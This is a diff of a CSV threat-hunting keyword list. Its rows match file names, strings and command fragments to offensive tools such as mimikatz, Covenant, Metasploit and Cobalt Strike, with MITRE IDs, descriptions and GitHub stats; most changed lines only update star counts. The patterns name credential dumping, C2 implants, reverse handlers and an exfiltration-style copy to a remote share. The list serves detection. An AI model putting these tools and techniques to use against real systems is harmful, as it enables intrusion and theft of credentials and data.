DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","0","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" -"*ConvertToShellcode*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*ConvertToShellcode*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*ConvertTo-Shellcode.*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" "*ConvertTo-Shellcode.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*ConvertToShellcode.py*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" @@ -8759,32 +8907,32 @@ "*CopyAndPasteEnum.bat*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*CopyAndPasteFileDownloader.bat*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*Copy-Item -Path * -Destination \\$IP\transfer*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*Copyright (c) 2023 whoamianony.top*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" -"*core/handler/reverse*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*core/handler/reverse*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*core/sprayers/lync.py*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*core/teamserver/stagers/*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*CoreSecurity/impacket/*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*corscanner -i urls.txt -t 100*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Could not write NTLM Hashes to the specified JTR_Dump_Path *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*Couldn't clone GPO {} (maybe it does not exist?*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*Covenant.API*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Covenant.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Covenant.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Covenant.Models*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Covenant.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Covenant/Covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Covenant/wwwroot*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CovenantAPI.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CovenantAPIExtensions.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CovenantBaseMenuItem.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CovenantService.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CovenantUser.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CovenantUserLogin.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CovenantUserLoginResult.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CovenantUserRegister.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Could not write NTLM Hashes to the specified JTR_Dump_Path *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*Couldn't clone GPO {} (maybe it does not exist?*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*Covenant.API*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant.Models*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant/Covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Covenant/wwwroot*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantAPI.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantAPIExtensions.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantBaseMenuItem.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantService.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantUser.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantUserLogin.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantUserLoginResult.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CovenantUserRegister.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*covid19_koadic.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" -"*cow-branded-longhorn.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*cow-branded-longhorn.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*cowpatty -f *.txt -r *.cap -s *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Cowpatty*","offensive_tool_keyword","Cowpatty","coWPAtty - Brute-force dictionary attack against WPA-PSK.","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/joswr1ght/cowpatty","1","1","N/A","N/A","2","152","34","2018-12-04T22:26:47Z","2017-08-14T20:33:22Z" "*cowsay -f dragon 'PEzor!!*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" @@ -8793,60 +8941,60 